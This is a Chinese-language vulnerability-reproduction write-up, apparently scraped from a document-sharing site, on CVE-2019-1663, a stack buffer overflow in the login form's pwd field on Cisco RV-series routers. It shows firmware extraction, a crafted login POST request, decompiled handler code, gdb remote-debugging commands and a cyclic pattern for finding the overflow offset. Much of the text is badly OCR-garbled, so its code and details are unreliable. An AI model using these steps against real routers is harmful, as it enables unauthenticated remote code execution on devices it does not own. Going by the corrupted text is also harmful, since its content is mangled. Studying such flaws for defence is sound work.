（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx

《（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx（14页珍藏版）》请在第一文库网上搜索。

1、(CVE-2019-1663)堆栈缓冲区溢出漏洞一、漏洞简介CVE-2019-1663是一个影响Cisco的多个低端设备的堆栈缓冲区，由于管理界面没有对登录表单的pwd字段进行严格的过滤，底层在处理请求时，Strcpy函数导致堆栈溢出，未经身份验证的远程攻击者可以在设备上执行任意代码二、漏洞影响CiscoRV11OW1.2.1.7CiscoRV130RV130W1.0.3.45CiscoRV215W1.3.0.8三、复现过程OxO1固件提取这里我使用时CiscoRV130W1.0.3.44进行测试的，binwa1k对固件进行提取可以看出文件系统是SqUaShfS,并且是小端存储方式,得到一个类

2、1inux目录totnwrcIbtndmIH2,6t,81,-a81w?t-a-,H一,tnerIMe,nta-.Ctcrff,1，b1”，KU,八Sfi1erufi1eHWnnufi1emeft1eHiefi1eruftunft1TUefi1emfi1enu“nnnuS1dCwtcMsbi*rctcheSytn/O0mss12tdwrtbtnrpRtch*v*1ntrtRHMtchtur/btn/tftMMtchwtrsbntfcHzthsusrsb1webrootmatchesSfes7gnJfJ5C33GWH3PSwatchesKCJs7tk7yAtcheusr*btndhc11ettc

3、hesvtfMtctwittincur1*41cMusrtetnjsorteFetchesusrsbtn12tMMtchesusr/sb1n/ca1natchsU“八IwIIXSso4.1,MtchsMsry1tb八tbuq.1.dfetchesvfrtbUbn*tMp.so.1SMtchsw*r11b1tbcry*to.*o.t.ZtCh，uft1bUtt1.M.11.*4tceU“八tb八tbZ，M.s。AtcsVSf1tb4r.tcRAtMS(ttn)any1aterversto.See.Z2-:w.wes*n85”r”“I1”J根据之前分析的多个嵌入式设备的经验，猜测这个可能就是处理h

4、ttp请求的底层文件0x03漏洞分析对Web登录界面的Iogin.cgi发送如下的PC)ST请求POST/1ogin.CgiHTTP/1.1Host:10.10.10.2User-Agent:Mozi11a/5.0(X11;1inuxx86_64;rv:60.0)Gecko/20100101Firefox/60.0Accept:texthtm1japp1icationxhtm1+xm1,app1icationm1jq=0.9j*jq=0.8Accept-1anguage:en-US,enjq=0.5Accept-Encoding:gzip,def1ateReferer:https:/10.10

5、.10.2/Content-Type:app1ication/x-www-form-ur1encodedContent-1ength:137Connection:c1oseUpgrade-Insecure-Requests:1submit_button=1ogin&submit_type=&gui_action=&wait_time=0&change_action=&enc=1&user=cisco&pwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&Se1_1ang=EN这里向pwd发送32字节的值，对登录界面的http处理请求在IDA中的是sub.2C614Q,地址是

6、0x0002C614v13atoi(v12);sprintf(v67jw%d,j+1);nvram_set(wdefau1t_1oginM&byte_899D8);v14=sub_1D170(int)MuserM);if(!v14)v15=v36=(charr)v14;if(!v14)v36V15；v16=sub-1D17e(int)pwd);IVR7=(charX)VI6;if(Iv16)v17=;if(!v16)v37=v17;nptr=(char*)sub-1D170(int)enc);if(Inptr)nptr=(char*)&word89A4C;if(!post)SUbj1CFB4(

7、35);v25sub_1D170(int)MuserM);if(!v25i)v26=mh;v36=(char*)v25;if(Iv25)v36v26;v27=sub-1D170(int),pwdm);37=(char*);if(!v27)v28=,;if(!v27)v37=v28;nptr=(char)sub_1D170(int)encM);if(!nptr)nptr=(char)&word_89A4C;函数将POST请求的参数进行解析，存储到.bss段OGeAea7DC80x69;ie.bssA9C18DCBGxbF,Oa.bA8(19DCB6E;nbss：e(MA8C1ADCB*bsszA

8、8(1BDCB,.bss(XMA811AEnj1DCBeence,ebss0A3(20a1_1DCB.广，0e1bss：eoeA8C22MBOCBwuserw,0,IbtrS：eoeAM27KiscowIDCBcisco,ejnPwdDCBpwd,eF831e5d1199e4_1DCBaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwtO# Ibs;(KK巾；aSe11ang-D(Bse1-1ang,bssOA8CS8aEn-DCBEN,0# ibsseA8(5eDCB# .bs0eA8C5FDCB# 1beeeaAaceeOCBe然后，将PWd参数的值从.bss段中提取，调

9、用StrCPy将值存到动态分配的内存中“xt:MeK2S8text:WX2MIoCgSttxtcMeX2MKNm,K9CeXteWX25(MOVt7CeXtMeX264text：MeX264Ioc2064texteK2M1Mtmx冰1CMtcvtreeK27CHPttM9X274BNfteMtMejstextMex27SIoc.textM27Stw*MMX77Smu.I63*1.(U)1setarchitecturearm确定要调试的是arm架构gefsetfo11ow-fork-modechi1d确定调试的进程gefsetso1ib-search-pathhomec1b1iotfirmwar

10、e/cisco/_RV130.bin.extractedsquashfs-root1ib加载要用到的1ib文件geffi1e/home/c1b/1iot/firmware/cisco/_RV130.bin.extracted/squashfs-root/usr/sbin/httpd加载调试文件geftargetremote10.10.10.2:1234与远程建立连接已经建立调试连接，可以进行调试了查找溢出的位置，使用pattern生成512个字符串gefpattercreate512+Generatingapatternof512bytesaaaabaaacaaadaaaeaaafaaagaa

11、ahaaaiaaaJaaakaaa1aaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaab1aabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaac1aacmaacnaacoaacpaacqaacraacsaactaacuaacVaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaad1aadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaae1aaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaeaaeyaaezaafbaafcaaf+Savedas$_gef0,通